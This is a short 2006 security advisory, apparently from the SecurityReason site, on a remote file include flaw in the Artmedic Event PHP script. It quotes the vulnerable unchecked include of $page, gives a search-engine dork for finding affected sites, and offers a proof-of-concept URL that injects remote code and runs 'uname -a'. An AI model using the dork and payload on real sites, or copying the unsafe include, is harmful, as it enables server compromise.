Artmedic Event Remote File Include Vulnerability

Advisory Content :

Original Advisory :
http://kurdishsecurity.blogspot.com/2006/04/artmedic-event-remote-file-i
nclude.html

#Artmedic Event Remote File Include Vulnerability

#Website : http://www.artmedic.de/

#Script : Artmedic Event Script

#Risk : High

#Class : Remote

#Greetz : B3g0k,Nistiman,Flot,Netqurd etc..

#d0rk : "/event/index.php?page=" "Artmedic Web Desing"

Description [Deutch] "artmedic event, author Ellen Baitinger, artmedic
webdesign, http://www.artmedic.de Dieses Programm ist Freeware und darf
kostenlos eingesetzt werden, solange der Link auf artmedic webdesign und
die Hinweise der Autorenschaft unangetastet bleiben."

I.

if(!file_exists("artmedic_event_inc.php"))

{include("setup.php");

exit;

}

require("artmedic_event_inc.php");

echo "$eventtitle";

$start = filectime($news);

$jetzt = time();

$update = "$start"+"$timespan";

if($jetzt >= $update)

{include("artmedic_event_html.php");}

------------------------------------------------------------------------
-----

II.

if(!$id and !$page)

{@include("artmedic_event1.htm");}

if(!$id and $page)

{@include("$page");}

if($id==1)

{include("artmedic_event_inputform.htm");}

if($id==2)

{include("artmedic_event_add.php");}

?

------------------------------------------------------------------------
-------

III.

Proof of Concept:

http://www.site.com/[path]/event/index.php?page=evilcode.txt?&cmd=uname -a

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

Artmedic Event Remote File Include Vulnerability